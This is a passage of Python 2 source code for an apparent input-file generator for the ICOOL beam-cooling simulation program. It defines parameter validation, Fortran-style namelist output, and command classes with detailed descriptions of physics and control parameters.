Checks whether the parameters specified for command are valid, all required parameters are
specified and all parameters are of correct type. If not, raises an exception.
"""
command_parameters_dict = self.get_command_params()
check_params = not self.check_command_params_valid(
command_params,
command_parameters_dict) or not self.check_all_required_command_params_specified(
command_params,
command_parameters_dict) or not self.check_command_params_type(
command_params,
command_parameters_dict)
if check_params:
return False
else:
return True
def check_command_params_call(self, command_params):
"""
Checks whether the parameters specified for command are valid and all required parameters exist.
"""
command_parameters_dict = self.get_command_params()
return self.check_command_params_valid(command_params, command_parameters_dict) and\
self.check_command_params_type(
command_params,
command_parameters_dict)
def setall(self, command_params):
for key in command_params:
self.__setattr__(key, command_params[key])
def setdefault(self, command_params):
command_params_dict = self.get_command_params()
for key in command_params_dict:
if key not in command_params:
self.__setattr__(key, command_params_dict[key]['default'])
def check_type(self, icool_type, provided_type):
"""Takes provided python object and compares with required icool type name.
Returns True if the types match and False otherwise.
"""
provided_type_name = provided_type.__class__.__name__
print icool_type, provided_type_name
if icool_type == 'Real':
if provided_type_name == 'int' or provided_type_name == 'long' or provided_type_name == 'float':
return True
else:
return False
if icool_type == 'Integer':
if provided_type_name == 'int' or provided_type_name == 'long':
return True
else:
return False
if icool_type == 'Logical':
if provided_type_name == 'bool':
return True
else:
return False
if icool_type == 'Field':
if isinstance(provided_type, Field):
return True
else:
return False
if icool_type == 'Material':
if isinstance(provided_type, Material):
return True
else:
return False
if icool_type == 'SubRegion':
if isinstance(provided_type, SubRegion):
return True
else:
return False
if icool_type == 'Distribution':
if isinstance(provided_type, Distribution):
return True
else:
return False
        if icool_type == 'Correlation':
            if isinstance(provided_type, Correlation):
                return True
            else:
                return False
        # Unrecognized icool_type names fall through to a mismatch.
        return False
def get_command_params(self):
return self.command_params
def is_required(self, command_param, command_parameters_dict):
# command_parameters_dict = self.get_command_params()
if 'req' not in command_parameters_dict[command_param]:
return True
else:
return command_parameters_dict[command_param]['req']
def gen_parm(self):
command_params = self.get_command_params()
#parm = [None] * len(command_params)
parm = [None] * self.num_params
for key in command_params:
pos = int(command_params[key]['pos']) - 1
val = getattr(self, key)
parm[pos] = val
print parm
return parm
def for001_str_gen(self, value):
if value.__class__.__name__ == 'bool':
if value is True:
return '.true.'
else:
return '.false.'
else:
return str(value)
def get_begtag(self):
return self.begtag
def get_endtag(self):
return self.endtag
def get_line_splits(self):
return self.for001_format['line_splits']
class ICoolNameList(ICoolObject):
def gen_for001(self, file):
name = self.__class__.__name__.lower()
file.write('&')
file.write(name)
file.write(' ')
count = 0
items_per_line = 5
for key in self.command_params:
if hasattr(self, key):
file.write(str(key))
file.write('=')
file.write(self.for001_str_gen(getattr(self, key)))
file.write(' ')
count = count + 1
if count % items_per_line == 0:
file.write('\n')
file.write('/')
file.write('\n')
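    # For example, a Cont instance with npart=1000 and bgen=True set would be
    # rendered by gen_for001 as a one-line Fortran-style namelist:
    #   &cont npart=1000 bgen=.true. /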
class Container(ICoolObject):
"""Abstract class container for other commands.
"""
def __init__(self, enclosed_commands=None):
if enclosed_commands is None:
print "Setting self.enclosed_commands to []"
self.enclosed_commands = []
else:
if self.check_allowed_enclosed_commands(enclosed_commands):
self.enclosed_commands = enclosed_commands
def __setattr__(self, name, value):
# command_parameters_dict = self.command_params
if name == 'enclosed_commands':
object.__setattr__(self, name, value)
else:
if not self.check_command_param(name):
return False
else:
if not self.check_command_param_type(name, value):
return False
else:
object.__setattr__(self, name, value)
return True
def __str__(self):
ret_str = ''
for command in self.enclosed_commands:
ret_str += str(command)
return ret_str
def add_enclosed_command(self, command):
if self.check_allowed_enclosed_command(command) is False:
sys.exit(0)
else:
self.enclosed_commands.append(command)
def insert_enclosed_command(self, command, insert_point):
        if self.check_allowed_enclosed_command(command) is False:
sys.exit(0)
else:
self.enclosed_commands.insert(insert_point, command)
def remove_enclosed_command(self, delete_point):
del self.enclosed_commands[delete_point]
def check_allowed_enclosed_command(self, command):
try:
if command.__class__.__name__ not in self.allowed_enclosed_commands:
raise ie.ContainerCommandError(
command,
self.allowed_enclosed_commands)
except ie.ContainerCommandError as e:
print e
return False
return True
def check_allowed_enclosed_commands(self, enclosed_commands):
pass
def gen_for001(self, file):
for command in self.enclosed_commands:
print 'Command is: ', command
if hasattr(command, 'gen_for001'):
command.gen_for001(file)
else:
file.write(self.for001_str_gen(command))
class ICoolNameListContainer(ICoolNameList, Container):
def gen_for001(self, file):
ICoolNameList.gen_for001(self, file)
Container.gen_for001(self, file)
class Title(ICoolObject):
command_params = {
'title': {'desc': 'Title of ICOOL simulation',
'doc': '',
'type': 'String',
'req': True,
'default': None}
}
def __init__(self, title):
self.title = title
def __str__(self):
return 'Problem Title: ' + self.title + '\n'
def __repr__(self):
return 'Problem Title: ' + self.title + '\n'
def gen_for001(self, file):
file.write(self.title)
file.write('\n')
class Cont(ICoolNameList):
command_params = {
'betaperp': {
'desc': '(R) beta value to use in calculating amplitude variable A^2', 'doc': '',
'type': 'Real',
'req': False,
'default': None},
'bgen': {
'desc': '(L) if .true.=>generate initial beam particles, otherwise read input from FOR003.DAT (true)',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'bunchcut': {
'desc': '(R) maximum time difference allowed between a particle and the reference particle [s] (1E6)',
'doc': '',
'type': 'Real',
'req': False,
'default': 1E6},
'bzfldprd': {
'desc': '(R) Bz for solenoid at location of production plane (0.) This is used for output to '
'file for009.dat and for canonical angular momentum correction.',
'doc': '',
'type': 'Real',
'req': False,
'default': None},
'dectrk': {
'desc': '(L) if .true. => continue tracking daughter particle following decay.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'diagref': {
'desc': '(L) if .true. => continue tracking daughter particle following decay.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'epsf': {
'desc': '(R) desired tolerance on fractional field variation, energy loss, and multiple '
'scattering per step',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.05},
'epsreq': {
'desc': '(R) required tolerance on error in tracking parameters (1E-3) This parameter is '
'only used if varstep = true',
'doc': '',
'type': 'Real',
'req': False,
'default': None},
'epsstep': {
'desc': '(R) desired tolerance in spatial stepping to reach each destination plane [m]',
'type': 'Real',
'doc': '',
'req': False,
'default': 1E-6},
'ffcr': {
'desc': '(L) if .true. => inserts form feed and carriage returns in the output log file so there '
'are two plots per page starting at the top of a page',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'forcerp': {
'desc': '(L) if .true. => set x, y, Px, and Py for reference particle to 0 for each new REFP '
'command and for each ACCEL region with phasemodel=4.',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'fsav': {
            'desc': '(L) if .true. => store particle info at plane IZFILE into file FOR004.DAT. (false). '
            'It is possible to get the initial distribution of particles that get a given error flag by '
            'setting the plane=IFAIL. It is possible to get the initial distribution of particles that '
            'successfully make it to the end of the simulation by setting the plane= -1.',
'doc': '',
'type': 'Logical',
'req': False,
'default': None},
'fsavset': {
'desc': '(L) if .true. => modify data stored using FSAV in FOR004.DAT to have z=0 and '
'times relative to reference particle at plane IZFILE.',
'doc': '',
            'type': 'Logical',
'req': False,
'default': False},
'f9dp': {
'desc': '(I) number of digits after the decimal point for floating point variables in FOR009.DAT '
'{4,6,8,10,12,14,16,17} (4) F9DP=17 gives 16 digits after the decimal point and 3 digits in the '
'exponent',
'doc': '',
'type': 'Integer',
'req': False,
'default': None},
'goodtrack': {
'desc': '(L) if .true. and BGEN=.false. => only accepts input data from file FOR003.DAT if '
'IPFLG=0.; if .false. => resets IPFLG of bad input tracks to 0 (this allows processing a '
'file of bad tracks for diagnostic purposes)',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'izfile': {
'desc': '(I) z-plane where particle info is desired when using FSAV. Use 1 to store beam at '
'production. Saves initial particle properties for bad tracks if IZFILE=IFAIL #. Saves initial '
'particle properties for tracks that get to the end of the simulation if IZFILE=-1. IZFILE '
'should point to the end of a REGION or to an APERTURE , ROTATE or TRANSPORT pseudoregion '
'command.',
'doc': '',
'type': 'Integer',
'req': False,
'default': None},
'magconf': {
'desc': '(I) if 19 < MAGCONF=mn < 100 => reads in file FOR0mn.DAT, which contains data on '
'solenoidal magnets. Used with SHEET, model 4.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0},
'mapdef': {
'desc': '(I) if 19 < MAPDEF=mn < 100 => reads in file FOR0mn.DAT, which contains data on how '
'to set up field grid. Used with SHEET, model 4.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0},
'neighbor': {
'desc': "(L) if .true. => include fields from previous and following regions when calculating "
"field. This parameter can be used with soft-edge fields when the magnitude of the "
"field doesn't fall to 0 at the region boundary. A maximum of 100 region can be used "
"with this feature.",
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'neutrino': {
'desc': '(I) if 19 < NEUTRINO=mn < 100 => writes out file FOR0mn.DAT, which contains '
'neutrino production data. See section 5.2 for the format.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0},
'nnudk': {
'desc': '(I) # of neutrinos to produce at each muon, pion and kaon decay.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 1},
'npart': {
'desc': '(I) # of particles in simulation. The first 300,000 particles are stored in memory. '
'Larger numbers are allowed in principle since ICOOL writes the excess particle '
'information to disc. However, there can be a large space and speed penalty in doing '
'so.',
'doc': '',
'type': 'Integer',
'req': False,
'default': None},
'nprnt': {
'desc': ' Number of diagnostic events to print out to log file.',
'doc': '',
'type': 'Integer',
'req': False,
'default': -1},
'npskip': {
'desc': 'Number of input particles in external beam file to skip before processing starts',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0},
'nsections': {
'desc': '(I) # of times to repeat basic cooling section (1). This parameter can be used to '
'repeat all the commands between the SECTION and ENDSECTION commands in the problem '
'definition. If a REFP command immediately follows the SECTION command, it is not '
'repeated',
'doc': '',
'type': 'Integer',
'req': False,
'default': 1},
'ntuple': {
            'desc': '(L) if .true. => store information about each particle after every region in file '
            'FOR009.DAT. This variable is forced to be false if RTUPLE=true. (false)',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'nuthmin': {
'desc': '(R) Minimum polar angle to write neutrino production data to file. [radians]',
'doc': '',
'type': 'Real',
'req': False,
'default': 0},
'nuthmax': {
'desc': 'Maximum polar angle to write neutrino production data to file. [radians]',
'doc': '',
'type': 'Real',
'req': False,
'default': 3.14},
'output1': {
'desc': 'if .true. => write particle information at production (plane 1) to the '
'postprocessor output file for009.dat.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'phantom': {
            'desc': '(L) if .true. => force particle to keep initial transverse coordinates '
            'after every step. This is useful for making magnetic field maps. (false)',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'phasemodel': {
'desc': 'PHASEMODEL (I) controls how the phase is determined in rf cavities. (1) '
'1: takes phase directly from ACCEL command [degrees] '
'2 - 6: takes phase model from REFP command '
            '7: reads phases in from file FOR0mn.DAT, where RFPHASE=mn. See sec. 5.1.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 1},
'prlevel': {
            'desc': 'Controls level of print information to log file (for NPRINT events); higher # '
            'gives more print (1)',
'doc': '1: values at end of region '
'2: + values at end of each time step '
'3: + E,B values at each step '
'4: + information in cylindrical coordinates',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 4},
'prnmax': {
'desc': 'Sets maximum number of steps to generate print out inside a region',
'doc': '',
'type': 'Integer',
'req': False,
'default': 300},
'pzmintrk': {
'desc': 'Sets the value of Pz below which tracking stops. [GeV/c]',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.001},
'rfdiag': {
'desc': 'if 19 < RFDIAG=mn < 100 => writes rf diagnostic information at the '
'end of each accelerator region to file FOR0mn.DAT.',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0,
'min': 19,
'max': 100},
'rfphase': {
'desc': 'If PHASEMODEL=5 => reads rf phases, frequencies and gradients '
'for the cavities from file FOR0mn.DAT, where RFPHASE=mn '
'and 19 < mn < 100 (0)',
'doc': '',
'type': 'Integer',
'req': False,
'default': 0,
'min': 19,
'max': 100},
'rnseed': {
'desc': 'Random number seed (-1) Set to a negative integer',
'doc': '',
'type': 'Integer',
'req': False,
'default': -1},
'rtuple': {
'desc': 'If .true. => particle information in file FOR009.DAT is generated after '
'every RTUPLEN steps.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'rtuplen': {
'desc': '# of steps to skip between RTUPLE generated outputs',
'doc': '',
'type': 'Integer',
'req': False,
'default': 5},
'run_env': {
'desc': 'If true => run ICOOL in beam envelope mode, i.e. no tracking',
'doc': 'For solenoidal channels only.',
'type': 'Logical',
'req': False,
'default': False},
'scalestep': {
'desc': 'Factor that modifies all step sizes in a problem simultaneously.',
'doc': 'Only works in fixed stepsize mode.',
'type': 'Real',
'req': False,
'default': 1.0},
'spin': {
'desc': 'If .true. => include calculation of polarization',
'doc': '',
            'type': 'Logical',
'req': False,
'default': False},
'spinmatter': {
'desc': 'Controls whether muon depolarization effects in matter are simulated',
'doc': '0: no depolarization simulation '
            '1: depolarization simulation using Rossmanith model '
'2: depolarization simulation using spin flip probabilities',
'type': 'Integer',
'req': False,
'default': 0,
'min': 0,
'max': 3},
'spintrk': {
'desc': 'Controls whether spin variables are tracked',
'doc': '0: no spin tracking '
'1: track spin in muon rest frame using BMT equations',
'type': 'Integer',
'req': False,
'default': 0,
'min': 0,
'max': 1},
'stepmax': {
'desc': 'maximum step size that can be used for variable stepping [m]',
'doc': '',
'type': 'Real',
'req': False,
'default': 1},
'stepmin': {
'desc': 'minimum step size that can be used for variable stepping [m]',
'doc': '',
'type': 'Real',
'req': False,
'default': 1E-5},
'steprk': {
'desc': 'If .true. => use 4th order Runge-Kutta integrator for tracking. '
'Otherwise it uses the Boris push method in straight regions',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'summary': {
'desc': 'if true => writes region summary table to for007.dat',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'termout': {
'desc': 'If .true. => write output to terminal screen',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'timelim': {
'desc': 'Time limit for simulation [min]',
'doc': '',
'type': 'Real',
'req': False,
'default': 1E9},
'varstep': {
'desc': 'If .true. => use adaptive step size; otherwise use fixed step ZSTEP '
'(until reaching the last step in a region).',
'doc': 'This variable is forced to be false (1) in wedge material '
'regions, (2) when the number of radial regions is greater than 1, and (3) when '
'PHASEMODEL=2.',
'type': 'Logical',
'req': False,
'default': True}}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
def __str__(self):
return ICoolObject.__str__(self, 'CONT')
def __repr__(self):
return '[Control variables: ]'
    def gen(self, file):
        # ICoolObject defines no gen(); delegate to the namelist generator.
        self.gen_for001(file)
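# Illustrative construction of the control-variable namelist (parameter values
# here are hypothetical; any key of Cont.command_params is accepted):
#   cont = Cont(npart=1000, varstep=False, prlevel=2)
#   cont.gen_for001(open('for001.dat', 'w'))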
class Bmt(ICoolNameListContainer):
allowed_enclosed_commands = ['BeamType']
command_params = {
'nbeamtyp': {
'desc': '# of beam types, e.g., particles of different masses.',
'doc': '',
'type': 'Integer',
'req': True,
'default': 1},
'bmalt': {
'desc': 'if true => flip sign of alternate particles when BGEN = true.',
'doc': '',
'type': 'Logical',
'req': False,
'default': False}}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Ints(ICoolNameList):
command_params = {
'ldedx': {
'desc': 'If .true. => simulate mean ionization energy loss dE/dx (true)',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'lscatter': {
'desc': 'if .true. => simulate multiple scattering',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'lstrag': {
'desc': 'If .true. => simulate energy straggling',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'ldecay': {
'desc': 'If .true. => simulate particle decays',
'doc': '',
'type': 'Logical',
'req': False,
'default': True},
'ldray': {
'desc': 'If .true. => simulate discrete energy loss from delta rays',
'doc': 'When LDRAY is true, the program forces the parameters DELEV=2 and STRAGLEV=5.',
'type': 'Logical',
'req': False,
'default': True},
'linteract': {
'desc': 'If .true. => simulate inelastic nuclear interactions of pions, kaons and protons',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'lspace': {
'desc': 'If .true. => consider effects of space charge',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'lelms': {
            'desc': 'If .true. => use the ELMS model [2] for energy loss and scattering',
            'doc': 'When this command is true an external file ELMSCOM.TXT must be provided. '
            'This file consists of two lines giving (1) the ELMS run directory including path '
            'and (2) the root part of the path name to the ELMS database files. For example, '
            '\\muon\\elmsdb\\rundirectory.txt\n'
            '\\muon\\elmsdb\\elmsfv3run\n'
            'ELMS only works in regions containing hydrogen (the SCATLEV model is used in other '
            'regions). '
            'For hydrogen regions use a stepsize around 5 mm for maximum accuracy. A stepsize of '
            '1 mm gives significantly worse results.',
'type': 'Logical',
'req': False,
'default': False},
'lsamcs': {
            'desc': 'If .true. => use the SAMCS model [3] of correlated straggling and scattering',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'delev': {
'desc': 'Model level for dEdx (2)',
'doc': '1: Bethe-Bloch\n'
'2: Bethe-Bloch with density effect\n'
'3: restricted Bethe-Bloch with density effect\n'
'4: test mode with dE = const * dz, independent of velocity and angle',
'type': 'Integer',
'req': False,
'default': 2,
'min': 1,
'max': 4},
'scatlev': {
'desc': '(I) model level for multiple scattering',
'doc': '1: Gaussian( 0, Rossi-Greisen )\n'
'2: Gaussian( 0, Highland )\n'
'3: Gaussian( 0, Lynch-Dahl )\n'
'4: Bethe version of Moliere distribution (with Rutherford limit)\n'
'5: Rutherford\n'
'6: Fano (with Rutherford limit)\n'
'7: Tollestrup (with Rutherford limit)\n'
'Level 2 contains a logarithm term in computing the Gaussian width, so\n'
'it is not useful for general monte carlo work. It gives an accurate estimate of\n'
'the width of the distribution when the step size is the same as the region size.\n'
'In models 4, 6, and 7 when the effective number of scatters is less than 20 Rutherford\n'
'scattering is used with the actual number of scatters in a given step taken from a\n'
'Poisson distribution.',
'type': 'Integer',
'req': False,
'default': 6,
'min': 1,
'max': 6},
'straglev': {
'desc': '(I) Model level for straggling ',
'doc': '1: Gaussian( Bohr )\n'
'2: Landau distribution\n'
'3: (not used)\n'
'4: Vavilov distribution (with appropriate Landau and Gaussian limits determined '
'by the program)\n'
'5: restricted energy fluctuations from continuous processes with energy below DCUTx.',
'type': 'Integer',
'req': False,
'default': 4,
'min': 1,
'max': 5},
'declev': {
'desc': '(I) model level for particle decays (1)',
'doc': '1: uniform polar decay angle for daughter particle in parent rest frame\n'
'2: 90 degree polar decay angle for daughter particle in parent rest frame\n'
'3: uniform polar decay angle for daughter particle in parent rest frame; '
'no mu-->e decays.\n'
'4: 90 degree polar decay angle for daughter particle in parent rest frame; '
'no mu->e decays\n'
'5: uniform polar decay angle for daughter particle in parent rest frame; '
'no mu-->e decays;\n'
'save accumulated fractional decay length in POL(1).',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 5},
'intlev': {
'desc': 'Model level for nuclear interactions (1)',
'doc': '1: stop tracking after an interaction\n'
'2: stop tracking after an interaction, except for protons which generate '
'a pion from the Wang distribution.',
'type': 'Integer',
'req': False,
'default': 1,
'min': 1,
'max': 2},
'spacelev': {
'desc': 'Model level for space charge (3)',
'doc': '1: image charge of moving bunch in cylindrical, metallic can\n'
'2: crude transverse space charge for free space applied to all regions\n'
'3: Gaussian bunch space charge (transverse and longitudinal) for free space '
'applied to all regions\n'
'4: same as model 3 for single bunch in a bunch train. All the particles are '
'superimposed\n'
'on 1 bunch given by parameter FRFBUNSC. Adjust PARBUNSC accordingly.',
'type': 'Integer',
'req': False,
'default': 3,
'min': 1,
'max': 4},
'dcute': {
'desc': 'Kinetic energy of electrons, above which delta rays are discretely '
'simulated [GeV] ',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.003},
'dcutm': {
'desc': 'Kinetic energy of muons and other heavy particles, above which delta '
'rays are discretely simulated [GeV] ',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.003},
'elmscor': {
'desc': 'ELMS correlation ',
'doc': '0: run ELMS without correlations (0)\n'
'1: run ELMS with correlations',
'type': 'Integer',
'req': False,
'default': 0,
'min': 0,
'max': 1},
'facfms': {
            'desc': 'Factor to correct the Z(Z+1) term in the characteristic angle squared '
            'χC2 in Moliere multiple scattering theory',
'doc': '',
'type': 'Real',
'req': False,
'default': 1.0},
'facmms': {
            'desc': 'Factor to correct the screening angle squared χA2 in Moliere multiple '
            'scattering theory',
'doc': '',
'type': 'Real',
'req': False,
'default': 1.0},
'fastdecay': {
'desc': 'If true => use unphysical decay constants to make {μ,π,K} decay immediately. ',
'doc': '',
'type': 'Logical',
'req': False,
'default': False},
'frfbunsc': {
'desc': '(R) RF frequency used for space charge model 4. [MHz] (201.) ',
'doc': '',
'type': 'Real',
'req': False,
'default': 201},
'parbunsc': {
'desc': 'Number of muons per bunch for space charge calculation ',
'doc': '',
'type': 'Real',
'req': False,
'default': 4E12},
'pdelev4': {
'desc': 'Momentum for DELEV=4 calculation',
'doc': '',
'type': 'Real',
'req': False,
'default': 0.200},
'wanga': {
'desc': 'Wang parameter A ',
            'doc': 'The Wang distribution is given by '
            'd2σ/dp dΩ = A pMAX x (1-x) exp{-B x^C - D pT}, where x = pL / pMAX',
'type': 'Real',
'req': False,
'default': 90.1},
'wangb': {
'desc': 'Wang parameter B',
'doc': '',
'type': 'Real',
'req': False,
'default': 3.35},
'wangc': {
'desc': 'Wang parameter C',
'doc': '',
'type': 'Real',
'req': False,
'default': 1.22},
'wangd': {
'desc': 'Wang parameter D',
'doc': '',
'type': 'Real',
'req': False,
'default': 4.66},
'wangpmx': {
'desc': 'Wang parameter pMAX (1.500) The sign of this quantity is used to select '
'π+ or π- production.',
'doc': '',
'type': 'Real',
'req': False,
'default': 1.5},
'wangfmx': {
'desc': 'The maximum value of the Wang differential cross section',
'doc': '',
'type': 'Real',
'req': False,
'default': 13.706},
}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
class Nhs(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Nsc(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Nzh(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Nrh(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Nem(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Ncv(ICoolNameListContainer):
allowed_enclosed_commands = []
command_params = {}
def __init__(self, **kwargs):
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
class Region(ICoolObject):
def __init__(self, kwargs):
ICoolObject.__init__(self, kwargs)
def __call__(self, **kwargs):
ICoolObject.__call__(self, kwargs)
def __str__(self):
return '[A Region can be either a RegularRegion or PseudoRegion.]'
def __repr__(self):
return '[A Region can be either a RegularRegion or PseudoRegion.]'
def __setattr__(self, name, value):
ICoolObject.__setattr__(self, name, value)
def gen_for001(self, file):
if hasattr(self, 'begtag'):
print 'Writing begtag'
file.write(self.get_begtag())
file.write('\n')
parm = self.gen_parm()
splits = self.get_line_splits()
count = 0
split_num = 0
cur_split = splits[split_num]
for command in parm:
if count == cur_split:
file.write('\n')
count = 0
split_num = split_num + 1
cur_split = splits[split_num]
print 'Command is: ', command
if hasattr(command, 'gen_for001'):
command.gen_for001(file)
else:
file.write(self.for001_str_gen(command))
file.write(' ')
count = count + 1
file.write('\n')
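    # Worked example of the splitting above: with parm = [a, b, c, d, e] and
    # for001_format = {'line_splits': [3, 1, 1]}, the parameters are written
    # on three lines, 'a b c' / 'd' / 'e' (SubRegion below uses this layout).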
class RegularRegion(Region):
"""
    RegularRegion commands include: SECTION, BEGS, REPEAT, CELL, SREGION, ENDREPEAT, ENDCELL,
    and ENDSECTION.
"""
def __init__(self, kwargs):
Region.__init__(self, kwargs)
def __str__(self):
        return '[A RegularRegion can be either a SECTION, BEGS, REPEAT, CELL, SREGION, ENDREPEAT, ENDCELL,\
        or ENDSECTION.]'
    def __repr__(self):
        return '[A RegularRegion can be either a SECTION, BEGS, REPEAT, CELL, SREGION, ENDREPEAT, ENDCELL,\
        or ENDSECTION.]'
class PseudoRegion(Region):
"""
PseudoRegion commands include: APERTURE, CUTV, DENP, DENS, DISP, DUMMY, DVAR, EDGE, GRID
OUTPUT, REFP, REF2, RESET, RKICK, ROTATE, TAPER, TILT, TRANSPORT, BACKGROUND, BFIELD, ENDB, ! or &
"""
def __init__(self, kwargs):
Region.__init__(self, kwargs)
def __str__(self):
return '[A PseudoRegion can be either a APERTURE, CUTV, DENP, DENS, DISP, DUMMY, DVAR, EDGE, GRID\
OUTPUT, REFP, REF2, RESET, RKICK, ROTATE, TAPER, TILT, TRANSPORT, BACKGROUND, BFIELD, ENDB, ! or &]'
def __repr__(self):
return '[A PseudoRegion can be either a APERTURE, CUTV, DENP, DENS, DISP, DUMMY, DVAR, EDGE, GRID\
OUTPUT, REFP, REF2, RESET, RKICK, ROTATE, TAPER, TILT, TRANSPORT, BACKGROUND, BFIELD, ENDB, ! or &]'
class RegularRegionContainer(RegularRegion, Container):
def gen_for001(self, file):
# self.gen_begtag(file)
# if hasattr(self, 'begtag'):
# print 'Writing begtag'
# file.write(self.get_begtag())
# file.write('\n')
Region.gen_for001(self, file)
Container.gen_for001(self, file)
# self.gen_endtag(file)
if hasattr(self, 'endtag'):
file.write(self.get_endtag())
file.write('\n')
class Section(RegularRegionContainer):
"""
SECTION Start of cooling section region definition.
The data must end with an ENDSECTION. It can enclose any number of other commands.
If it is desired to repeat the section definitions, the control variable NSECTIONS should be
set >1 and a BEGS command is used to define where to start repeating.
"""
begtag = 'SECTION'
endtag = 'ENDSECTION'
num_params = 0
for001_format = {'line_splits': [0]}
allowed_enclosed_commands = [
'Begs',
'Repeat',
'Cell',
'Background',
'SRegion',
'Aperture',
'Cutv',
'Dens',
'Disp',
'Dummy',
'DVar',
'Edge',
'Output',
'Refp',
'Ref2',
'Reset',
'RKick',
'Rotate',
'Tilt',
'Transport',
        'Comment',
        'Repeat']
command_params = {
}
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def __str__(self):
return_str = 'SECTION\n'
return_str += str(Container.__str__(self))
return_str += 'END_SECTION\n'
return return_str
def __repr__(self):
return 'Section\n'
class Begs(RegularRegion):
    command_params = {}
    def __init__(self):
        RegularRegion.__init__(self, {})
def gen(self, file):
file.write('\n')
file.write('BEGS')
class Repeat(RegularRegionContainer):
"""
Start of a repeating group of region commands; the data must end with an ENDREPEAT
command. This can be used to repeat regions inside a cell. The repeat loop can enclose any
number of {SREGION, APERTURE, DENS, DISP, DUMMY, DVAR, EDGE, OUTPUT, REFP, REF2, RESET, RKICK,
ROTATE, TILT, TRANSPORT} commands. Repeat sections cannot be nested in other repeat sections.
(see parameters below)
"""
begtag = 'REPEAT'
endtag = 'ENDREPEAT'
num_params = 1
for001_format = {'line_splits': [1]}
optional_params = { #Not implemented yet
'enclosed': {'desc': 'Enclosed commands',
'doc': 'Must be one of allowed_enclosed_commands',
'type': ''}
}
command_params = {
'nrep': {'desc': '# of times to repeat following region commands',
'doc': '',
'type': 'Integer',
'req': True,
'pos': 1}
}
allowed_enclosed_commands = [
'SRegion',
'Aperture',
'Dens',
'Disp',
'Dummy',
'Dvar',
'Edge',
'Output',
'Refp',
'Ref2',
'Reset',
'Rkick',
'Rotate',
'Tilt',
'Transport']
# Used to add wrapped SRegion object. Will wrap object SRegion in Repeat with nrep = slen/outstep and generate
# a new SRegion With slen=outstep. Need to implement exception handling for types.
@classmethod
def wrapped_sreg(cls, **kwargs):
sreg = kwargs['sreg']
outstep = kwargs['outstep']
sreg_copy = copy.deepcopy(sreg)
nrep = int(sreg.slen/outstep)
sreg_copy.slen = outstep
r = cls(nrep=nrep)
output = Output()
r.add_enclosed_command(output)
r.add_enclosed_command(sreg_copy)
return r
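    # Illustrative use (names and numbers hypothetical): for an SRegion sreg
    # with slen=1.0 and a desired OUTPUT every 0.1 m,
    #   rep = Repeat.wrapped_sreg(sreg=sreg, outstep=0.1)
    # builds a REPEAT block with nrep=10 whose body is an OUTPUT command
    # followed by a copy of sreg with slen=0.1.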
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def __str__(self):
return_str = 'REPEAT\n' + str(Container.__str__(self)) + 'ENDREPEAT\n'
return return_str
def __repr__(self):
return 'Repeat\n'
def gen(self, file):
file.write('REPEAT')
Container.gen(self, file)
file.write('ENDREPEAT')
        file.write('\n')
class Background(PseudoRegion):
def __init__(self, name=None, metadata=None):
PseudoRegion.__init__(self, name, metadata)
class Bfield(PseudoRegion):
def __init__(self, name=None, metadata=None):
PseudoRegion.__init__(self, name, metadata)
class Edge(PseudoRegion):
